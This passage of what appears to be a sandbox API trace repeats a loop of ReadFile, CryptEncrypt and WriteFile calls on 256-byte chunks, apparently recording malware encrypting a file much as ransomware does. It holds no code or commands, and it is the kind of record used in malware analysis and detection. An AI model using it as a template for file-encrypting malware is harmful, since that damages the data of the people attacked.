lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.694] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.694] GetLastError () returned 0x0 [0152.694] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.694] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.694] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.694] GetLastError () returned 0x0 [0152.694] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.694] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.694] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.694] GetLastError () returned 0x0 [0152.694] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.694] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.694] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.694] GetLastError () returned 0x0 [0152.694] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.694] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.694] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.694] GetLastError () returned 0x0 [0152.694] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.695] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.695] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.695] GetLastError () returned 0x0 [0152.695] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.695] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.695] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.695] GetLastError () returned 0x0 [0152.695] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.695] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.695] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.695] GetLastError () returned 0x0 [0152.695] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.695] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.695] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.695] GetLastError () returned 0x0 [0152.695] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.695] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.695] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.695] GetLastError () returned 0x0 [0152.695] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.695] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.695] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.695] GetLastError () returned 0x0 [0152.695] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.696] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.696] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.696] GetLastError () returned 0x0 [0152.696] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.696] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.696] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.696] GetLastError () returned 0x0 [0152.696] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.696] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.696] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.696] GetLastError () returned 0x0 [0152.696] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.696] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.696] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.696] GetLastError () returned 0x0 [0152.696] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.696] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.696] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.696] GetLastError () returned 0x0 [0152.696] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.696] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.696] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.696] GetLastError () returned 0x0 [0152.696] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.696] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.697] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.697] GetLastError () returned 0x0 [0152.697] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.697] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.697] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.697] GetLastError () returned 0x0 [0152.697] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.697] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.697] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.697] GetLastError () returned 0x0 [0152.697] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.697] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.697] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.697] GetLastError () returned 0x0 [0152.697] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.697] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.697] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.697] GetLastError () returned 0x0 [0152.697] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.697] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.697] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.697] GetLastError () returned 0x0 [0152.697] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.697] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.697] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.698] GetLastError () returned 0x0 [0152.698] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.698] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.698] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.698] GetLastError () returned 0x0 [0152.698] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.698] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.698] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.698] GetLastError () returned 0x0 [0152.698] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.698] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.698] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.698] GetLastError () returned 0x0 [0152.698] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.698] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.698] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.698] GetLastError () returned 0x0 [0152.698] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.698] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.698] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.698] GetLastError () returned 0x0 [0152.698] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.698] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.699] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.699] GetLastError () returned 0x0 [0152.699] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.699] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.699] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.699] GetLastError () returned 0x0 [0152.699] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.699] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.699] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.699] GetLastError () returned 0x0 [0152.699] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.699] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, 